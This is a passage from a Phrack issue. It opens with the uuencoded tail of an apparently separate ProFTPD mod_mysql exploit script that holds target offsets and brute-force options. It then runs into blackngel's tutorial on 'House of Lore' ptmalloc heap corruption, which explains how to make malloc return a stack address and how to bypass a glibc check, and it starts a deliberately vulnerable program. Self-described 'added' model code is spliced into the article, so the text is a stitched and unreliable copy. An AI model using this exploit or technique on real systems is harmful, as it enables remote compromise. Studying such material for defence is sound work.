M<WES+F5X:70H,2D*"F]F9G-E=%]T87)G971S(#T@6PH)>R`*"0DG;F%M92<Z
M("=&961O<F$@,3`@4')O1E101"!P<F]F='!D+6UY<W%L+3$N,RXQ+38G+`H)
M"2=T>7!E)SH@)V]F9G-E="<L"@D))W)E<W!?8G5F)SH@,'@X,&5D.#@P+`H)
M"2=O9F9S970G.B`P>#@P-C-E93,L"@D))V5X96-V)SH@,'@P.#`U,C9B."P*
M"7TL"@E[(`H)"2=N86UE)SH@)T9E9&]R82`Y(%!R;T944$0@<')O9G1P9"UM
M>7-Q;"TQ+C,N,2TS)RP*"0DG='EP92<Z("=O9F9S970G+`H)"2=R97-P7V)U
M9B<Z(#!X,#@P96)C-C`L"@D))V]F9G-E="<Z(#!X,#@P-C,Y.&4L"@D))V5X
M96-V)SH@,'@P.#`U,C8V."P*"7TL"ET*"F)R=71E9F]R8V5?=&%R9V5T<R`]
M(%L*"7L*"0DC(#`X,&4T,#`P+3`X,&5C,#`P"@D))VYA;64G.B`G4')O1E10
M1"!&0R`Q,"<L"@D))W-T87)T)SH@,'@X,&5D.#@P*S$R."P*"0DG<W1O<"<Z
M(#!X.#!E9#@P-"P*"0DG<W1E<"<Z("TR."P*"7TL"@E["@D)(R`P.#!F,3(R
M,"!L("`@("!/("YB<W,@("`P,#`P,30P,"`@("`@("`@("`@("`@<F5S<%]B
M=68*"0DG;F%M92<Z("=D96)I86X@=&5S="<L"@D))W-T87)T)SH@,'@P.#!F
M,3(R,"LR,#`L"@D))W-T;W`G.B`P>#`X,&8Q,C(P*S@P+`H)"2=S=&5P)SH@
M+3(X+`H)?0I="@ID968@9'5M<%]T87)G971S*"DZ"@EC;W5N=&5R(#T@,0H)
M<')I;G0@(D]F9G-E="!B87-E9"!T87)G971S(&%V86EL86)L93HB"@EF;W(@
M=&%R9V5T(&EN(&]F9G-E=%]T87)G971S.@H)"7!R:6YT(")<=%1A<F=E="!;
M)61=("T@)7,B("4@*&-O=6YT97(L('1A<F=E=%LG;F%M92==*0H)"6-O=6YT
M97(@*ST@,0H)"@EC;W5N=&5R(#T@,0H)<')I;G0@(B(*"7!R:6YT(")"<G5T
M969O<F-E('1A<F=E=',@879A:6QA8FQE.B(*"69O<B!T87)G970@:6X@8G)U
M=&5F;W)C95]T87)G971S.@H)"7!R:6YT(")<=%1A<F=E="!;)61=("T@)7,B
M("4@*&-O=6YT97(L('1A<F=E=%LG;F%M92==*0H*"7D@/2`P+S`*"@ES>7,N
M97AI="@Q*0H*9&5F('!A<G-E7V%R9W,H87)G<RDZ"@EP87)S97(@/2!/<'1I
M;VY087)S97(H=7-A9V4](G5S86=E.B`E<')O9R!;;W!T:6]N<UT@:&]S=%]T
M;U]E>'!L;VET(BD*"7!A<G-E<BYA9&1?;W!T:6]N*"(M="(L("(M+71A<F=E
M="(L(&%C=&EO;CTB<W1O<F4B+"!T>7!E/2)I;G0B+"!H96QP/2)$:7-T<FEB
M=71I;VX@=&\@=&%R9V5T(BP@9&5F875L=#TP+"!D97-T/2)T87)G970B*0H)
M<&%R<V5R+F%D9%]O<'1I;VXH(BUP(BP@(BTM<&]R="(L(&%C=&EO;CTB<W1O
M<F4B+"!H96QP/2)#;VYN96-T(&]N('!O<G0B+"!D969A=6QT/3(Q*0H)<&%R
M<V5R+F%D9%]O<'1I;VXH(BUS(BP@(BTM<W-L(BP@86-T:6]N/2)S=&]R95]T
M<G5E(BP@:&5L<#TB16YA8FQE(%-33"!F;W(@97AP;&]I=&%T:6]N("AV:6$@
M4D9#-#(Q-RDB+"!D969A=6QT/49A;'-E*0H)<&%R<V5R+F%D9%]O<'1I;VXH
M(BUM(BP@(BTM;6]D92(L(&%C=&EO;CTB<W1O<F4B+"!T>7!E/2)C:&]I8V4B
M+"!C:&]I8V5S/5LB8G)U=&5F;W)C92(L(")O9F9S971S(ETL(&1E9F%U;'0]
M(F]F9G-E=',B*0H)<&%R<V5R+F%D9%]O<'1I;VXH(BUL(BP@(BTM;&ES="UT
M87)G971S(BP@86-T:6]N/2)S=&]R95]T<G5E(BP@9&5F875L=#U&86QS92D*
M"@EG<F]U<"`]($]P=&EO;D=R;W5P*'!A<G-E<BP@(D1E8G5G9VEN9R!O<'1I
M;VYS(BP@(E1H97-E(&]P=&EO;G,@87)E(&UO<W1L>2!U<V5F=6P@9F]R(&1E
M8G5G9VEN9R!T:&4@97AP;&]I="!C;V1E+"!O<B!I9B!Y;W4@:VYO=R!H;W<@
M=&AE(')E;6]T92!M86-H:6YE(&ES(&-O;F9I9W5R960N(BD*"6=R;W5P+F%D
M9%]O<'1I;VXH(BTM=7-E<BUC;VQU;6XM;&5N9W1H(BP@86-T:6]N/2)S=&]R
M92(L(&1E9F%U;'0],"P@:&5L<#TB4U%,(%5S97)N86UE(&-O;'5M;B!L96YG
M=&@N(BP@='EP93TB:6YT(BP@9&5S=#TB=7-E<E]C;VQU;6Y?;&5N9W1H(BD*
M"6=R;W5P+F%D9%]O<'1I;VXH(BTM<VQE97`M869T97(M8V]N;F5C="(L(&%C
M=&EO;CTB<W1O<F5?=')U92(L(&AE;'`](E-L965P(&$@8V]U<&QE(&]F('-E
M8V]N9',@<V\@82!D96)U9V=E<B!C86X@8F4@8V]N;F5C=&5D(BP@9&5F875L
M=#U&86QS92P@9&5S=#TB<VQE97!?869T97)?8V]N;F5C="(I"@EG<F]U<"YA
M9&1?;W!T:6]N*"(M+6EG;F]R92UC86-H92(L(&%C=&EO;CTB<W1O<F5?=')U
M92(L(&AE;'`](DEG;F]R92!T:&4@8V%C:&4@;V8@<W5C8V5S<V9U;"!P<F5V
M:6]U<R!A='1E;7!T<R(L(&1E9F%U;'0]1F%L<V4L(&1E<W0](FEG;F]R95]C
M86-H92(I"@EG<F]U<"YA9&1?;W!T:6]N*"(M+7-E960B+"!A8W1I;VX](G-T
M;W)E(BP@='EP93TB:6YT(BP@:&5L<#TB4V5E9"!T:&4@<F%N9&]M(&YU;6)E
M<B!W:71H('-U<'!L:65D('9A;'5E(BP@9&5F875L=#TP+"!D97-T/2)S965D
M(BD*"@EP87)S97(N861D7V]P=&EO;E]G<F]U<"AG<F]U<"D*"0H);W!T<RP@
M87)G<R`]('!A<G-E<BYP87)S95]A<F=S*&%R9W,I"@H):68H;&5N*&%R9W,I
M(#T](#`I.@H)"7!R:6YT(")0;&5A<V4@<W!E8VEF>2!T:&4@:&]S="!T;R!E
M>'!L;VET(@H)"7-Y<RYE>&ET*#$I"@H):68H;W!T<RYT87)G970@/3T@,"DZ
M"@D)<')I;G0@(E!L96%S92!S<&5C:69Y(&$@=&%R9V5T('1O(&%T=&%C:RXN
M(@H)"61U;7!?=&%R9V5T<R@I"@H):68H;W!T<RYL:7-T7W1A<F=E=',I.@H)
M"61U;7!?=&%R9V5T<R@I"@H):68H;W!T<RYS<VP@86YD(&YO="!S<VQ?879A
M:6QA8FQE*3H*"0EP<FEN="`B+2US<VP@=7-E9"P@8G5T('1H:7,@=F5R<VEO
M;B!O9B!P>71H;VX@9&]E<R!N;W0@:&%V92`G:6UP;W)T('-S;"<@;W!T:6]N
M(@H)"7!R:6YT(")&;W(@=F5R<VEO;G,@;V8@<'ET:&]N(#P@,BXV+"!Y;W4@
M8V%N('5S92!H='1P.B\O<'EP:2YP>71H;VXN;W)G+W!Y<&DO<W-L(@H)"7!R
M:6YT(")T;R!G970@=&AA="!S=7!P;W)T(@H)"7-Y<RYE>&ET*#$I"@H):68H
M;W!T<RYS965D*3H*"0ER86YD;VTN<V5E9"AO<'1S+G-E960I"@D)<')I;G0@
M(ELK72!3965D960@=VET:"`E9"(@)2!O<'1S+G-E960*"@ER971U<FX@;W!T
M<RP@87)G<PH*9&5F(&UA:6XH87)G=6UE;G1S*3H*"@EI9B@B+2UT97-T(B!I
M;B!A<F=U;65N=',I.@H)"6EM<&]R="!D;V-T97-T"@D)9&]C=&5S="YT97-T
M;6]D*"D*"0ER971U<FX*"@EO<'1S+"!A<F=S(#T@<&%R<V5?87)G<RAA<F=U
M;65N=',I"@H):68H;W!T<RYM;V1E(#T](")O9F9S971S(BDZ"@D)<&\@/2!0
M<F]&5%!$7T]F9G-E=',H87)G<ULP72P@;W!T<RD*"0EI9BAO<'1S+G1A<F=E
M="`\(#$@;W(@;W!T<RYT87)G970@/B!L96XH;V9F<V5T7W1A<F=E=',I*3H*
M"0D)9'5M<%]T87)G971S*"D*"0H)"7!O+G)U;BAO9F9S971?=&%R9V5T<UMO
M<'1S+G1A<F=E="TQ72D*"0H)96QI9BAO<'1S+FUO9&4@/3T@(F)R=71E9F]R
M8V4B*3H*"0EP8B`](%!R;T944$1?0G)U=&5F;W)C92AA<F=S6S!=+"!O<'1S
M*0H)"6EF*&]P=',N=&%R9V5T(#P@,2!O<B!O<'1S+G1A<F=E="`^(&QE;BAB
M<G5T969O<F-E7W1A<F=E=',I*3H*"0D)9'5M<%]T87)G971S*"D*"@D)<&(N
M<G5N*&)R=71E9F]R8V5?=&%R9V5T<UMO<'1S+G1A<F=E="TQ72D*"FEF(%]?
K;F%M95]?(#T]("=?7VUA:6Y?7R<Z"@EM86EN*'-Y<RYA<F=V6S$Z72D*"@``
`
end


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x08 of 0x10

|=-----------------------------------------------------------------------=|
|=-------------------=[ The House Of Lore: Reloaded ]=-------------------=|
|=-------------=[ ptmalloc v2 & v3: Analysis & Corruption ]=-------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[  by blackngel  ]=-------------------------=|
|=-----------------------------------------------------------------------=|


                  ^^
              *`* @@ *`*     HACK THE WORLD
             *   *--*   *    
                  ##         <blackngel1@gmail.com>
                  ||         <black@set-ezine.org>
                 *  *
                *    *       (C) Copyleft 2010 everybody
               _*    *_


--[ CONTENTS

   1 - Preface

   2 - Introduction

     2.1 - KiddieDbg Ptmalloc2

     2.2 - SmallBin Corruption

         2.2.1 - Triggering The HoL(e)

         2.2.2 - A More Confusing Example

   3 - LargeBin Corruption Method

   4 - Analysis of Ptmalloc3

     4.1 - SmallBin Corruption (Reverse)

     4.2 - LargeBin Method (TreeBin Corruption)

     4.3 - Implement Security Checks

         4.3.1 - Secure Heap Allocator (Utopian)

         4.3.2 - dnmalloc

         4.3.3 - OpenBSD malloc

   5 - Miscellany, ASLR and More

   6 - Conclusions

   7 - Acknowledgments

   8 - References

   9 - Wargame Code

--[ END OF CONTENTS



           .-----------.
---[ 1 ---[   Preface   ]---
           .-----------.

No offense, but I could say that sometimes the world of hackers (at least)
is divided into two camps: 
    
    1.- The illustrious characters who spend many hours finding holes in
    current software.
    
    2.- And the hackers who spend most of their time finding a way to
    exploit a vulnerable code/environment that does not exist yet.

Maybe it is a bit confusing, but this is like the old question: which 
came first, the chicken or the egg? Or better... Which came first, the bug 
or the exploit?

Unlike an ordinary Heap Overflow, which we could call the logical
progression over time of a Stack Overflow, something special and strange
seems to happen with The House of Lore technique: we know it's there (a
thorn in your mind), that something happens, that something is wrong and
that we can exploit it.

But we do not know how to do it. And that is what this is all about: we
know the technique (at least Phantasmal Phantasmagoria's explanation), but
has anyone seen a sample of vulnerable code that can be exploited with it?

Maybe someone is thinking: well, if the bug exists and it is an ordinary 
Heap Overflow... 

     1.- What are the conditions to create a new technique? 
     
     2.- Why does a special sequence of calls to malloc( ) and free( ) allow
     a specific exploit technique, and why does another sequence need
     another technique? 
     
     3.- What are the names of those sequences? Are the sequences a bug or 
     is it pure luck?

This can give much food for thought. If Phantasmal had left clear 
evidence of his theory, surely we would have forgotten about it, but as 
this did not happen, some of us spend all day analyzing how to create
code that can be attacked with a technique that a virtual expert 
gave us in 2005 in a magnificent article that everyone already knows, 
right?

We are talking about "Malloc Maleficarum" [1], a great theory that I myself
had the opportunity to demonstrate in practice in the "Malloc
Des-Maleficarum" [2] article. But unfortunately I left one job unresolved.
In the past I was not able to correctly interpret one of the techniques
presented by Phantasmal, namely "The House of Lore", but in a moment of
creativity it seems that I finally found a solution.

Here I present the details of how vulnerable code can be attacked with The
House of Lore (THoL from now on), thus completing a stage that for some
reason was left unfinished.

In addition, we will target not only the smallbin corruption method, which
many have heard of, but also introduce the complications of the largebin 
method and how to solve them. I also present two variants based on these 
techniques that I have found to corrupt the Ptmalloc3 structure.

There is also more content in this paper, such as a small program on which
one of the techniques can be applied; it is very useful for an
exploitation wargame.

And... yes, THoL was exactly the thorn that I had in my mind.



               << One can resist the invasion
                  of an army but one cannot
                  resist the invasion of ideas. >>

                                   [ Victor Hugo ]



           .----------------.
---[ 2 ---[   Introduction   ]---
           .----------------.

Before starting with practical examples, we reintroduce the technical
background of THoL. While one might take Phantasmal's theory as the only
support for the subsequent descriptions, we will offer a broader and
deeper approach to the subject, and also some small indications on how 
you can get information from Ptmalloc2 at runtime without having to 
modify or recompile your personal GlibC.

We note that dynamic hooks could be a better way to reach this goal. More
control, more conspicuous.



               << Great spirits have always encountered
                  violent opposition from mediocre minds. >>

                                         [ Albert Einstein ]



             .-----------------------.
---[ 2.1 ---[   KiddieDbg Ptmalloc2   ]---
             .-----------------------.

To make things easier for the reader when we perform the subsequent
tests, let's show the simple way you can use PTMALLOC2 to obtain the
necessary information during each attack.

To avoid the tedious task of recompiling GLIBC every time one makes a minor 
change in "malloc.c", we decided to download the sources of ptmalloc2
directly from: http://www.malloc.de/malloc/ptmalloc2-current.tar.gz.

Then we compiled it on a Kubuntu 9.10 Linux distribution (typing make is
not a great effort), and you can link it directly as a static library into
each of our examples like this:

   gcc prog.c libmalloc.a -o prog

However, before compiling this library, we allowed ourselves the luxury of 
introducing a couple of debugging statements. To achieve this we made use
of a function that is not accessible to everybody; one has to be very eleet
to know it, and only those who have been able to escape the Matrix have
the right to use it. This lethal weapon is known among the gurus as 
"printf( )".

And now, enough jokes, here are the small changes in "malloc.c" to get some 
information at runtime:


----- snip -----

Void_t*
_int_malloc(mstate av, size_t bytes)
{
....
  checked_request2size(bytes, nb);

  if ((unsigned long)(nb) <= (unsigned long)(av->max_fast)) {
    ...
  }

  if (in_smallbin_range(nb)) {
    idx = smallbin_index(nb);
    bin = bin_at(av,idx);
    if ( (victim = last(bin)) != bin) {

printf("\n[PTMALLOC2] -> (Smallbin code reached)");
printf("\n[PTMALLOC2] -> (victim = [ %p ])", victim);

      if (victim == 0) /* initialization check */
        malloc_consolidate(av);
      else {
        bck = victim->bk;

printf("\n[PTMALLOC2] -> (victim->bk = [ %p ])\n", bck);

        set_inuse_bit_at_offset(victim, nb);
        bin->bk = bck;
        bck->fd = bin;

        if (av != &main_arena)
	  victim->size |= NON_MAIN_ARENA;
        check_malloced_chunk(av, victim, nb);
        return chunk2mem(victim);
      }
    }
  }

----- snip -----


Here we can see when a chunk is extracted from its corresponding bin to
satisfy a memory request of appropriate size. In addition, we can check
the value that the "bk" pointer of a chunk holds if it has been
previously altered.


----- snip -----

  use_top:
    victim = av->top;
    size = chunksize(victim);

    if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
      ........
printf("\n[PTMALLOC2] -> (Chunk from TOP)");
      return chunk2mem(victim);
    }

----- snip -----


Here we simply print a notice so that we know when a memory request is
served from the Wilderness chunk (av->top).


----- snip -----

        bck = unsorted_chunks(av);
        fwd = bck->fd;
        p->bk = bck;
        p->fd = fwd;
        bck->fd = p;
        fwd->bk = p;
printf("\n[PTMALLOC2] -> (Freed and unsorted chunk [ %p ])", p);

----- snip -----


Unlike the first two changes, which were introduced in the "_int_malloc( )"
function, the last one goes in "_int_free( )" and clearly indicates when a 
chunk has been freed and placed in the unsorted bin for later use.



               << I have never met a man so
                  ignorant that I couldn't
                  learn something from him. >>

                           [ Galileo Galilei ]



             .-----------------------.
---[ 2.2 ---[   SmallBin Corruption   ]---
             .-----------------------.

Before starting, let's look again at the piece of code that will trigger
the vulnerability described in this paper:


----- snip ----- 

  if (in_smallbin_range(nb)) {
    idx = smallbin_index(nb);
    bin = bin_at(av,idx);
    if ( (victim = last(bin)) != bin) {

      if (victim == 0) /* initialization check */
        malloc_consolidate(av);
      else {
        bck = victim->bk;
        set_inuse_bit_at_offset(victim, nb);
        bin->bk = bck;
        bck->fd = bin;

        if (av != &main_arena)
	  victim->size |= NON_MAIN_ARENA;
        check_malloced_chunk(av, victim, nb);
        return chunk2mem(victim);
      }

----- snip ----- 


To reach this area of the code inside "_int_malloc( )", one assumes that
the size of the memory request is larger than the current value of 
"av->max_fast", in order to pass the first check and avoid fastbin[ ] 
utilization. Remember that this value is "72" by default.

Then comes "in_smallbin_range(nb)", which in turn checks whether the
requested chunk of memory is smaller than MIN_LARGE_SIZE, defined as 512
bytes in malloc.c.

We know from the documentation that: "the size bins for less than 512 bytes
contain always the same size chunks". With this we know that if a chunk of
a certain size has been introduced in its corresponding bin, a further
request of the same size will find the appropriate bin and will return the
previously stored chunk. The functions "smallbin_index(nb)" and 
"bin_at(av, idx)" are responsible for finding the appropriate bin for the
chunk requested.

We also know that a "bin" is a pair of pointers, "fd" and "bk", whose
purpose is to close the doubly linked list of free chunks. The macro
"last(bin)" returns the "bk" pointer of this "fake chunk", which indicates
the last available chunk in the bin (if any). If none exists, "bin->bk"
points to the bin itself, the search fails and execution leaves the
smallbin code.

If there is an available chunk of adequate size, the process is simple. 
Before being returned to the caller, it must be unlinked from the list and,
in order to do so, malloc uses the following instructions:


   1) bck = victim->bk; // bck points to the penultimate chunk

   2) bin->bk = bck;    // bck becomes the last chunk

   3) bck->fd = bin;    // fd pointer of the new last chunk points
                        // to the bin to close the list again


If all is correct, the user is given the pointer *mem of victim by the 
macro "chunk2mem(victim)".

The only extra tasks in this process are to set the PREV_INUSE bit of the
contiguous chunk, and also to manage the NON_MAIN_ARENA bit if victim is 
not in the main arena by default.

And here is where the game starts.

The only value that someone can control in this whole process is obviously 
the value of "victim->bk". But to accomplish this, a necessary condition 
must be satisfied:

   1 - That two chunks have been allocated previously, that the latter has
       been freed and that the first is vulnerable to an overflow.

If this is true, the overflow of the first chunk allows us to manipulate
the header of the already freed second chunk, specifically the "bk"
pointer, because the other fields are not interesting at this time. Always
remember that the overflow must occur after the release of this second
chunk, and I insist on it because we do not want to set off the alarms
within "_int_free()" before its time.

As mentioned, if this manipulated second chunk is placed in its 
corresponding bin and a new request of the same size is performed, the 
smallbin code is triggered, and we therefore reach the code that interests 
us.

"bck" holds the altered "bk" pointer of victim and, as a result, becomes
the last chunk through "bin->bk = bck". Then a subsequent call to 
malloc( ) with the same size could deliver a chunk at the memory position
with which we had altered the "bk" pointer, and if this were in the 
stack we already know what happens.

In this attack one must be careful with the statement "bck->fd = bin",
since this code tries to write the bin's address to the "fd" pointer to
close the linked list; this memory area must have write permissions.

One last thing is really important for the success of our attack:

When a chunk is freed, it is inserted into the so-called "unsorted bin".
This is a special bin, also a doubly linked list, with the peculiarity
that the chunks are not sorted (obviously) according to size. This bin is
like a stack: chunks are placed in it when they are freed, and they are
always inserted in the first position.

This is done with the intention that a subsequent call to "malloc( ),
calloc( ) or realloc( )" can make use of this chunk if its size can fulfill
the request. This is done to improve efficiency in the memory allocation 
process as each chunk introduced in the unsorted bin has a chance to be 
reused immediately without going through the sorting algorithm.

How does this process work?

It all begins within "_int_malloc( )" with the next loop:

   while ( (victim = unsorted_chunks(av)->bk) != unsorted_chunks(av))

then it takes the penultimate chunk of the list:

   bck = victim->bk

It checks whether the memory request is within "in_smallbin_range( )" and
whether the request could be met with victim. Otherwise, it proceeds to
remove victim from the unsorted bin with:


  unsorted_chunks(av)->bk = bck;
  bck->fd = unsorted_chunks(av);


which is the same as saying: the bin points to the penultimate chunk, and
the penultimate chunk points to the bin which becomes the latest chunk in
the list.

Once removed from the list, two things can happen. Either the size of the
removed chunk matches the request made (size == nb), in which case malloc
returns the memory of this chunk to the user, or it does not match, and
that's when malloc proceeds to place the chunk in the appropriate bin with:


   bck = bin_at(av, victim_index);
   fwd = bck->fd;
   .....
   .....
   victim->bk = bck;
   victim->fd = fwd;
   fwd->bk = victim;
   bck->fd = victim;


Why do we mention this? Well, the condition that we mentioned requires that
the freed and manipulated chunk be placed in its appropriate bin, since, as
Phantasmal said, altering an unsorted chunk is not interesting at this
time.

With this in mind, our vulnerable program should call malloc( ) between the
vulnerable copy function and the subsequent call to malloc( ) requesting 
the same size as the chunk recently freed. In addition, this intermediate 
call to malloc( ) should request a size larger than the released one, so 
that the request cannot be served from the unsorted list of chunks and
malloc proceeds to sort the chunks into their respective bins.
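
The sorting step described above, as an added model (not code from this
article or from ptmalloc2): a small simulation of the unsorted list and the
smallbins that replays the free/malloc order with and without the
intermediate larger request. The sizes 136 and 1432 are the 32-bit chunk
sizes for requests of 128 and 1423 bytes; fastbins, largebins and the top
chunk itself are not modelled, and all names are chosen for this example.

```c
#include <stddef.h>
#include <stdio.h>

/* Model only: the list fields of a chunk, not the real malloc_chunk. */
struct chunk { size_t size; struct chunk *fd, *bk; };

enum source { FROM_SMALLBIN, FROM_UNSORTED, FROM_TOP };
struct served { enum source src; struct chunk *chunk; };
struct trace  { struct served step[3]; };

#define MIN_LARGE_SIZE 512
#define NSMALLBINS     (MIN_LARGE_SIZE >> 3)

static struct chunk unsorted;              /* head of the unsorted list */
static struct chunk smallbin[NSMALLBINS];  /* one list head per size    */
static struct chunk buff2 = { 136, NULL, NULL };  /* constructed chunk  */

static void model_init(void)
{
    unsorted.fd = unsorted.bk = &unsorted;
    for (size_t i = 0; i < NSMALLBINS; i++)
        smallbin[i].fd = smallbin[i].bk = &smallbin[i];
}

/* free() and the sorting step both insert at the front of a list. */
static void insert_front(struct chunk *bin, struct chunk *c)
{
    struct chunk *bck = bin, *fwd = bin->fd;
    c->bk = bck;  c->fd = fwd;
    fwd->bk = c;  bck->fd = c;
}

static void model_free(struct chunk *c) { insert_front(&unsorted, c); }

/* nb is an already normalized chunk size. */
static struct served model_malloc(size_t nb)
{
    struct served r = { FROM_TOP, NULL };
    struct chunk *victim, *bck;
    /* 1. Smallbin path: take last(bin) if the bin is not empty. */
    if (nb < MIN_LARGE_SIZE) {
        struct chunk *bin = &smallbin[nb >> 3];
        if ((victim = bin->bk) != bin) {
            bck = victim->bk;
            bin->bk = bck;
            bck->fd = bin;
            r.src = FROM_SMALLBIN;  r.chunk = victim;
            return r;
        }
    }
    /* 2. Walk the unsorted list from its tail. */
    while ((victim = unsorted.bk) != &unsorted) {
        bck = victim->bk;
        unsorted.bk = bck;
        bck->fd = &unsorted;
        if (victim->size == nb) {          /* exact fit: hand it out */
            r.src = FROM_UNSORTED;  r.chunk = victim;
            return r;
        }
        if (victim->size < MIN_LARGE_SIZE) /* otherwise sort it */
            insert_front(&smallbin[victim->size >> 3], victim);
        /* chunks of 512 bytes or more would go to a largebin (not modelled) */
    }
    /* 3. Nothing reusable: serve from the top chunk. */
    return r;
}

/* free, a larger request, then two requests of the freed chunk's size. */
static struct trace with_intermediate_malloc(void)
{
    struct trace t;
    model_init();
    model_free(&buff2);
    t.step[0] = model_malloc(1432);        /* the larger request */
    t.step[1] = model_malloc(buff2.size);
    t.step[2] = model_malloc(buff2.size);
    return t;
}

/* Same-size request right after free(): the chunk is never sorted. */
static struct served without_intermediate_malloc(void)
{
    model_init();
    model_free(&buff2);
    return model_malloc(buff2.size);
}

int main(void)
{
    static const char *name[] = { "smallbin", "unsorted", "top" };
    struct trace t = with_intermediate_malloc();
    for (int i = 0; i < 3; i++)
        printf("with larger request, malloc %d: %s\n", i + 1, name[t.step[i].src]);
    printf("without it: %s\n", name[without_intermediate_malloc().src]);
    return 0;
}
```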

We note before completing this section that a bin of a real-life 
application might contain several chunks of the same size stored and 
waiting to be used. When a chunk comes from the unsorted bin, it is
inserted into its appropriate bin as the first in the list, and according
to our theory, our altered chunk is not used until it occupies the last 
position (last(bin)). If this occurs, multiple calls to malloc( ) with the 
same size must be triggered so that our chunk reaches the desired position 
in the circular list. At that point, the "bk" pointer must be hacked.

Graphically, it would pass through these stages:

Stage 1: Insert victim into smallbin[ ].


                   bin->bk  ___  bin->fwd
                  o--------[bin]----------o
                  !         ^ ^           !
               [last]-------| |-------[victim]
                 ^|   l->fwd    v->bk    ^|
                 |!                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |
                     |________________|    


Stage 2: "n" calls to malloc( ) with same size.


                   bin->bk  ___  bin->fwd
                  o--------[bin]----------o
                  !         ^ ^           !
              [victim]------| |--------[first]
                 ^|   v->fwd    f->bk    ^|
                 |!                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |
                     |________________|    


Stage 3: Overwrite "bk" pointer of victim.


                   bin->bk  ___  bin->fwd
                  o--------[bin]----------o
 & stack          !         ^ ^           !
     ^--------[victim]------| |--------[first]
        v->bk     ^   v->fwd    f->bk    ^|
                  |                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |
                     |________________|  


Stage 4: Last call to malloc( ) with same size.


                   bin->bk  ___  bin->fwd
                  o--------[bin]----------o
 & -w- perm       !         ^ ^           !
     ^--------[&stack]------| |--------[first]
        v->bk     ^   v->fwd    f->bk    ^|
                  |                      |!
               [....]                  [....]
                   \\                  //
                    [....]        [....]
                     ^ |____________^ |
                     |________________|  


This is where the pointer "*mem" is returned pointing to the stack, thus 
giving full control of the attacked system. However, as there are people
who need to see to believe, read on to the next section.

Note: I have not checked all versions of glibc, and some changes have been
made since I wrote this paper. For example, on an Ubuntu box (with glibc
2.11.1) we see the next fix:


----- snip -----

        bck = victim->bk;
        if (__builtin_expect (bck->fd != victim, 0))
          {
            errstr = "malloc(): smallbin double linked list corrupted";
            goto errout;
          }
        set_inuse_bit_at_offset(victim, nb);
        bin->bk = bck;
        bck->fd = bin;

----- snip -----


This check can still be overcome if you control an area on the stack and
you can write an integer whose value is equal to the address of the
recently freed chunk (victim). This must happen before the next call to
malloc( ) with the same size requested.
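
An added side-by-side model (not glibc code, and not from this article) of
the smallbin removal without and with the glibc 2.11.1 test quoted above,
run on a bin whose only chunk has had its "bk" field replaced. The objects
bin, victim_chunk and foreign are constructed for the illustration, and the
model records the error string instead of aborting as glibc does.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model only: the list fields of a chunk, not the real malloc_chunk. */
struct chunk { size_t size; struct chunk *fd, *bk; };

struct outcome {
    struct chunk *returned;   /* chunk handed to the caller, or NULL       */
    struct chunk *next_last;  /* last(bin) as the next request will see it */
    const char   *err;        /* abort message, or NULL                    */
};

/* Constructed objects: a bin head, the freed chunk, and memory that was
 * never linked into the bin (stands for whatever victim->bk was set to). */
static struct chunk bin, victim_chunk, foreign;

static void setup(int corrupt_bk)
{
    memset(&foreign, 0, sizeof foreign);
    bin.fd = bin.bk = &bin;
    victim_chunk.size = 136;
    victim_chunk.bk = &bin;            /* front insertion into the empty bin */
    victim_chunk.fd = bin.fd;
    bin.fd->bk = &victim_chunk;
    bin.fd = &victim_chunk;
    if (corrupt_bk)
        victim_chunk.bk = &foreign;    /* models the overwritten header field */
}

/* Removal as in the ptmalloc2 code quoted in the article: no validation. */
static struct outcome take_unchecked(void)
{
    struct outcome o = { NULL, NULL, NULL };
    struct chunk *victim = bin.bk, *bck;

    if (victim != &bin) {
        bck = victim->bk;
        bin.bk = bck;
        bck->fd = &bin;                /* write through the unvalidated pointer */
        o.returned = victim;
    }
    o.next_last = bin.bk;
    return o;
}

/* Same removal with the glibc 2.11.1 test: bck must link back to victim. */
static struct outcome take_checked(void)
{
    struct outcome o = { NULL, NULL, NULL };
    struct chunk *victim = bin.bk, *bck;

    if (victim != &bin) {
        bck = victim->bk;
        if (bck->fd != victim)
            o.err = "malloc(): smallbin double linked list corrupted";
        else {
            bin.bk = bck;
            bck->fd = &bin;
            o.returned = victim;
        }
    }
    o.next_last = bin.bk;
    return o;
}

static struct outcome run(int corrupt_bk, int checked)
{
    setup(corrupt_bk);
    return checked ? take_checked() : take_unchecked();
}

static const char *who(const struct chunk *c)
{
    return c == &bin ? "bin (empty)" : c == &victim_chunk ? "victim" :
           c == &foreign ? "FOREIGN MEMORY" : "none";
}

int main(void)
{
    int corrupt, checked;
    for (corrupt = 0; corrupt < 2; corrupt++)
        for (checked = 0; checked < 2; checked++) {
            struct outcome o = run(corrupt, checked);
            printf("bk %-9s %-9s -> returned=%s next last(bin)=%s%s%s\n",
                   corrupt ? "corrupted" : "intact",
                   checked ? "checked" : "unchecked",
                   who(o.returned), who(o.next_last),
                   o.err ? " error: " : "", o.err ? o.err : "");
        }
    return 0;
}
```

With an intact list both versions behave identically and leave the bin
empty; only the corrupted case separates them.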



               << The grand aim of all science is to cover
                  the greatest number of empirical facts
                  by logical deduction from the smallest
                  number of hypotheses or axioms. >>

                                       [ Albert Einstein ]



               .-------------------------.
---[ 2.2.1 ---[   Triggering The HoL(e)   ]---
               .-------------------------.

After the theory... a practical example to apply this technique, followed
by a detailed description:


---[ thl.c ]---

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void evil_func(void)
{
    printf("\nThis is an evil function. You become a cool \
hacker if you are able to execute it.\n"); 
}

void func1(void)
{
    char *lb1, *lb2;

    /* two requests of the same size as the freed buff2 */
    lb1 = (char *) malloc(128);
    printf("LB1 -> [ %p ]", lb1);
    lb2 = (char *) malloc(128);
    printf("\nLB2 -> [ %p ]", lb2);

    strcpy(lb1, "Which is your favourite hobby? ");
    printf("\n%s", lb1);
    fgets(lb2, 128, stdin);
}

int main(int argc, char *argv[])
{
    char *buff1, *buff2, *buff3;

    malloc(4056);                    /* warm up the heap */
    buff1 = (char *) malloc(16);
    printf("\nBuff1 -> [ %p ]", buff1);
    buff2 = (char *) malloc(128);
    printf("\nBuff2 -> [ %p ]", buff2);
    buff3 = (char *) malloc(256);
